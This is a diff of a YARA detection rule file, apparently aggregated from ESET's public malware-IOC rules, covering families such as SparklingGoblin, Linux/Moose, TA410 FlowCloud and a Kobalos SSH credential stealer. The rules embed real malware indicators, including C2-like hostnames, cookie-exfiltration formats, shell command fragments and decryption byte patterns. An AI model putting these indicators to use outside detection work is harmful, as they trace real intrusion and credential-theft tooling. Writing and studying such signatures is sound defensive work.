description = "SparklingGoblin ChaCha20 loaders mutexes" author = "ESET Research" - id = "f22dffb1-466f-5a7b-b9aa-de7ba991db1a" - date = "2021-08-04" - modified = "2021-08-04" + id = "e33d2bc1-29d6-5117-8e0f-31f8bced0979" + date = "2021-05-20" + modified = "2021-08-26" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L497-L523" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "7077b842c53ee1581ad4150cdfaac3502bfc0fbd3b823190ad648e09f36e442d" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/sparklinggoblin/SparklingGoblin.yar#L465-L489" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b" + hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f" + hash = "8be6d5f040d0085c62b1459afc627707b0de89cf" + hash = "4668302969fe122874fb2447a80378dcb671c86b" + hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b" + hash = "9ce7650f2c08c391a35d69956e171932d116b8bd" + logic_hash = "00fbd514c8e2d6dea3b0f175e857a613e158b64caf1f970e814d62f1ebe9d35c" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" strings: - $s1 = "/mconfig/lunlian.txt" - $s2 = "http://sb.qrfy.ne" - $s3 = "folderlinkpath" - $s4 = "folderlinkcount" - $s5 = "onlymobilespider" - $s6 = "redirectreferer" - $s7 = "loadSuccessfull : " - $s8 = "spider" - $s9 = "<a href=" - $s11 = "?ReloadModuleConfig=1" - $s12 = "?DisplayModuleConfig=1" + $mutex_1 = "kREwdFrOlvASgP4zWZyV89m6T2K0bIno" + $mutex_2 = "v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw" condition: - ESET_IIS_Native_Module_PRIVATE and 5 of them + any of them } -import "pe" - -rule ESET_IIS_Group14 +rule ESET_Prikormka { meta: - description = "Detects Group 14 native IIS malware family" - author = "ESET Research" - id = "c773b09e-9f24-5e75-ba80-4be69af70b06" - date = "2021-08-04" - modified = "2021-08-04" + description = "No description has been set in the source file - ESET" + author = "ESET TI" + id = "6073aa34-d385-5ae8-b97d-9b3d61015aae" + date = "2016-05-10" + modified = "2019-08-28" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L525-L552" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "ef10a4dfb1a9164533677416a7c9ada715ce10bfc1e5f92b56cf54bd890d4575" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/groundbait/prikormka.yar#L130-L141" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "f64195e680fbaefedba248aa15b37ed30ba72f42958cc48963a140165e951bff" score = 75 quality = 80 tags = "" - license = "BSD 2-Clause" - version = "1" - - strings: - $i1 = "agent-self: %s" - $i2 = "/utf.php?key=" - $i3 = "/self.php?v=" - $i4 = "<script type=\"text/javascript\" src=\"//speed.wlaspsd.co" - $i5 = "now.asmkpo.co" - $s1 = "Baiduspider" - $s2 = "360Spider" - $s3 = "Sogou" - $s4 = "YisouSpider" - $s6 = "HTTP_X_FORWARDED_FOR" + Author = "Anton Cherepanov" + Description = "Operation Groundbait" + Contact = "threatintel@eset.com" + License = "BSD 2-Clause" condition: - ESET_IIS_Native_Module_PRIVATE and 2 of ($i*) or 5 of them + ESET_Prikormkadropper_PRIVATE or ESET_Prikormkamodule_PRIVATE or ESET_Prikormkaearlyversion_PRIVATE } -rule ESET_Mumblehard_Packer +rule ESET_Moose_1 { meta: - description = "Mumblehard i386 assembly code responsible for decrypting Perl code" - author = "Marc-Etienne M.Léveillé" - id = "981c18e3-ac28-54f5-97ab-44b1d12a1389" - date = "2015-04-07" - modified = "2015-05-01" - reference = "http://www.welivesecurity.com" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/mumblehard/mumblehard_packer.yar#L32-L47" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "a04f50a7054c4ce8ad9be4e7f3373ad4f36eb9443e223601974e852c25603f5f" + description = "No description has been set in the source file - ESET" + author = "ESET TI" + id = "4d228de6-ddbf-57c0-a330-5840c4d40dfc" + date = "2015-04-21" + modified = "2016-11-01" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/moose/linux-moose.yar#L41-L76" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "8bedac80a1f754ce56294ba9786b62a002aacd074f756724401efc61def127e6" score = 75 - quality = 80 + quality = 30 tags = "" - version = "1" + Author = "Thomas Dupuy" + Description = "Linux/Moose malware" + Contact = "github@eset.com" + License = "BSD 2-Clause" strings: - $decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-6] (56 5f | 89 F7) - 39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00 - 00 31 db 43 ac 30 d8 aa 43 e2 e2 } + $s0 = "Status: OK" + $s1 = "--scrypt" + $s2 = "stratum+tcp://" + $s3 = "cmd.so" + $s4 = "/Challenge" + $s7 = "processor" + $s9 = "cpu model" + $s21 = "password is wrong" + $s22 = "password:" + $s23 = "uthentication failed" + $s24 = "sh" + $s25 = "ps" + $s26 = "echo -n -e " + $s27 = "chmod" + $s28 = "elan2" + $s29 = "elan3" + $s30 = "chmod: not found" + $s31 = "cat /proc/cpuinfo" + $s32 = "/proc/%s/cmdline" + $s33 = "kill %s" condition: - $decrypt + ESET_Is_Elf_PRIVATE and all of them } -rule ESET_Prikormka +rule ESET_Moose_2 { meta: description = "No description has been set in the source file - ESET" author = "ESET TI" - id = "6073aa34-d385-5ae8-b97d-9b3d61015aae" - date = "2016-05-10" - modified = "2019-08-28" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/groundbait/prikormka.yar#L130-L141" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "f64195e680fbaefedba248aa15b37ed30ba72f42958cc48963a140165e951bff" + id = "74372984-dace-5665-a5d0-39b8d1002fa1" + date = "2016-10-02" + modified = "2016-11-01" + reference = "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/moose/linux-moose.yar#L78-L110" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "3f50d2d81d4c27e44d93804adcf93971017767ed0e020447cdb343931c2fbc43" score = 75 quality = 80 tags = "" - Author = "Anton Cherepanov" - Description = "Operation Groundbait" - Contact = "threatintel@eset.com" + Author = "Thomas Dupuy" + Description = "Linux/Moose malware active since September 2015" + Contact = "github@eset.com" License = "BSD 2-Clause" + strings: + $s1 = "Modules are loaded" + $s2 = "--scrypt" + $s3 = "http://" + $s4 = "https://" + $s5 = "processor " + $s6 = "cpu model " + $s7 = "Host: www.challpok.cn" + $s8 = "Cookie: PHPSESSID=%s; nhash=%s; chash=%s" + $s9 = "fail!" + $s10 = "H3lL0WoRlD" + $s11 = "crondd" + $s12 = "cat /proc/cpuinfo" + $s13 = "Set-Cookie: PHPSESSID=" + $s14 = "Set-Cookie: LP=" + $s15 = "Set-Cookie: WL=" + $s16 = "Set-Cookie: CP=" + $s17 = "Loading modules..." + $s18 = "-nobg" + condition: - ESET_Prikormkadropper_PRIVATE or ESET_Prikormkamodule_PRIVATE or ESET_Prikormkaearlyversion_PRIVATE + ESET_Is_Elf_PRIVATE and 5 of them } import "pe" @@ -119603,8 +121602,8 @@ rule ESET_Apt_Windows_TA410_Tendyron_Dropper date = "2020-12-09" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L34-L53" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L34-L53" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "45f7300a4b85624ad3fda5c73a24f53f53cb7990def4d84e04dcd8e5747f4f2e" score = 75 quality = 80 @@ -119634,8 +121633,8 @@ rule ESET_Apt_Windows_TA410_Tendyron_Installer date = "2020-12-09" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L55-L73" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L55-L73" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "9c3afb924747614f27c31cf2c3d98f4932a9d11597a3ac94263bf93be02801da" score = 75 quality = 80 @@ -119664,8 +121663,8 @@ rule ESET_Apt_Windows_TA410_Tendyron_Downloader date = "2020-12-09" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L75-L107" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L75-L107" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "16030a78ae9af8783f5913644294ceff861c8264ead8ca99435032be6d7949ef" score = 75 quality = 80 @@ -119699,8 +121698,8 @@ rule ESET_Apt_Windows_TA410_X4_Strings date = "2020-10-09" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L109-L125" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L109-L125" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "d4b2321a6d0eb0ca8d7c47596af2a45c22b3aef15d1832d64d6588a62cab312a" score = 75 quality = 74 @@ -119727,8 +121726,8 @@ rule ESET_Apt_Windows_TA410_X4_Hash_Values : FILE date = "2020-10-09" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L127-L149" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L127-L149" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "bcf3891ff888ca99af9aa0e239b29241ae819022607fb829c5731267add308ea" score = 75 quality = 80 @@ -119760,8 +121759,8 @@ rule ESET_Apt_Windows_TA410_X4_Hash_Fct : FILE date = "2020-10-09" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L151-L187" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L151-L187" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "3b2d44cb7685a99e9aeb08f886f6876d43ee99d1e52e40705c3fa97ce3bfa9a0" score = 75 quality = 80 @@ -119795,8 +121794,8 @@ rule ESET_Apt_Windows_TA410_Lookback_Decryption : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L189-L254" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L189-L254" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "016dca6be654fcd193acc481e6a998efbb77e7ebd09b26614422be1136dd02c0" score = 75 quality = 80 @@ -119872,8 +121871,8 @@ rule ESET_Apt_Windows_TA410_Lookback_Loader : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L256-L309" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L256-L309" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "98390dd664227ad747e5572771d12e7ebd2475d26db27e85508347ac6f44f3bf" score = 75 quality = 80 @@ -119937,8 +121936,8 @@ rule ESET_Apt_Windows_TA410_Lookback_Strings : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L311-L331" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L311-L331" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "d17ed604e3691c20fe489f95197b7b802ec951ed13d538fa6643449485b326b2" score = 75 quality = 80 @@ -119968,8 +121967,8 @@ rule ESET_Apt_Windows_TA410_Lookback_HTTP : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L333-L349" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L333-L349" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "0e777f56136cd11d62abdf4f120410d5fe9cd522cfc06afbf085414a96279bf7" score = 75 quality = 80 @@ -119995,8 +121994,8 @@ rule ESET_Apt_Windows_TA410_Lookback_Magic : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L351-L377" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L351-L377" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "442a08a77fd2db03e507c0d5a32b17ab4e5936a209f7af23ef3c33a4b9f3d0d5" score = 75 quality = 80 @@ -120032,8 +122031,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Loader_Strings : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L379-L415" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L379-L415" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "3c90723e009ffe2603910566ac52a324256676ee3ff128d94427681010e10e8b" score = 75 quality = 78 @@ -120076,11 +122075,11 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Header_Decryption : FILE description = "Matches the function used to decrypt resources headers in TA410 FlowCloud" author = "ESET Research" id = "403c1845-bc25-5a49-8553-8a0be18d6970" - date = "2024-01-08" + date = "2024-01-29" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L417-L496" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L417-L496" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "74b6c42bf2de159b2b0a15637e6bd94069367e3000c887714d6e3b50aa3646be" score = 75 quality = 80 @@ -120136,8 +122135,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Dll_Hijacking_Strings : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L498-L517" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L498-L517" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "e8082d4216364a12ba395f772b5caed94b3068d26a2b3a97ef711d61a82f65b3" score = 75 quality = 80 @@ -120167,8 +122166,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Malicious_Dll_Antianalysis : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L519-L552" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L519-L552" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "8f14352118d32a43c17f70bd753acc48bd314965f10ab97818e8a434bbda96d9" score = 75 quality = 80 @@ -120202,8 +122201,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Pdb : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L554-L567" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L554-L567" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "ff95ab0f8e68efe612a6e0d70cebd8bf815d6b5e3877c098ac0761382dc310d6" score = 75 quality = 80 @@ -120225,8 +122224,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Shellcode_Decryption : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L569-L615" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L569-L615" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "939ffe6a41c957aa5d6c012484b2deab49a5e71a4b7e203a41c180f872803921" score = 75 quality = 80 @@ -120266,8 +122265,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Fcclient_Strings : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L617-L639" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L617-L639" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "c05b7031a5aec1bcf29eca06c010c402edeb24a093a2043dbc21781dff22c7fe" score = 75 quality = 80 @@ -120299,8 +122298,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Fcclientdll_Strings : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L641-L669" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L641-L669" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "3a93f58cf14b57a96157077ec14aa6fb181e3da80f4ba46c0379a58b67c08a0e" score = 75 quality = 80 @@ -120338,8 +122337,8 @@ rule ESET_Apt_Windows_TA410_Rootkit_Strings : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L671-L697" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L671-L697" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "1d3ad63508c5e4bca32b9a44b738cb4a7384ccfa5704ce329260adb342ea4e60" score = 75 quality = 80 @@ -120375,8 +122374,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_V5_Resources : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L699-L720" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L699-L720" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "58f75dda53c6d4b3d88f464c452d855ac6dc88add5f4fba2641f52e7a1ae00ed" score = 75 quality = 80 @@ -120398,8 +122397,8 @@ rule ESET_Apt_Windows_TA410_Flowcloud_V4_Resources : FILE date = "2021-10-12" modified = "2022-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/ta410/ta410.yar#L722-L741" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/ta410/ta410.yar#L722-L741" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "7b475cfddb5f995f7e8e3293b8e6ae59a9e36143998bc444499b5dce467f8e9d" score = 75 quality = 80 @@ -120410,872 +122409,381 @@ rule ESET_Apt_Windows_TA410_Flowcloud_V4_Resources : FILE condition: uint16(0)==0x5a4d and pe.number_of_resources>=6 and for 5resource in pe.resources : (resource.type==10 and resource.language==1033 and (resource.name_string=="1\x000\x000\x000\x000\x00" or resource.name_string=="1\x000\x000\x000\x001\x00" or resource.name_string=="1\x000\x000\x000\x002\x00" or resource.name_string=="1\x000\x000\x000\x003\x00" or resource.name_string=="1\x000\x000\x000\x004\x00" or resource.name_string=="1\x000\x000\x000\x005\x00" or resource.name_string=="1\x000\x001\x000\x000\x00")) } -rule ESET_Dino -{ - meta: - description = "No description has been set in the source file - ESET" - author = "ESET TI" - id = "77d0a039-f60c-59ea-bad6-5b4b630007bb" - date = "2015-07-14" - modified = "2015-08-17" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/animalfarm/animalfarm.yar#L73-L96" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "898e527eb8b05050135dee7cbe974100710a1a3a6a5cb8eb03563ee1c0aca01f" - score = 75 - quality = 80 - tags = "" - Author = "Joan Calvet" - Description = "Dino backdoor" - Contact = "github@eset.com" - License = "BSD 2-Clause" - - strings: - $ = "PsmIsANiceM0du1eWith0SugarInsideA" - $ = "destroyPSM" - $ = "FM_PENDING_DOWN_%X" - $ = "%s was canceled after %d try (reached MaxTry parameter)" - $ = "you forgot value name" - $ = "wakeup successfully scheduled in %d minutes" - $ = "BD started at %s" - $ = "decyphering failed on bd" - - condition: - any of them -} -rule ESET_Kobalos -{ - meta: - description = "Kobalos malware" - author = "Marc-Etienne M.Léveillé" - id = "cdffbe3d-c19d-53a8-9051-48affae00c8a" - date = "2020-11-02" - modified = "2021-02-01" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/kobalos/kobalos.yar#L32-L56" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "9161d22f9fbb1700dc3121e32104240e34512cb280aaf950aec61513f89061ef" - score = 75 - quality = 80 - tags = "" - license = "BSD 2-Clause" - version = "1" - - strings: - $encrypted_strings_sizes = { - 05 00 00 00 09 00 00 00 04 00 00 00 06 00 00 00 - 08 00 00 00 08 00 00 00 02 00 00 00 02 00 00 00 - 01 00 00 00 01 00 00 00 05 00 00 00 07 00 00 00 - 05 00 00 00 05 00 00 00 05 00 00 00 0A 00 00 00 - } - $password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C } - $rsa_512_mod_header = { 10 11 02 00 09 02 00 } - $strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE } - - condition: - any of them -} -rule ESET_Kobalos_Ssh_Credential_Stealer +rule ESET_Keydnap_Downloader { meta: - description = "Kobalos SSH credential stealer seen in OpenSSH client" + description = "OSX/Keydnap Downloader" author = "Marc-Etienne M.Léveillé" - id = "b1fc5163-de48-57fc-8ae7-1f2be6c64d8a" - date = "2020-11-02" - modified = "2021-02-01" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/kobalos/kobalos.yar#L58-L73" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = 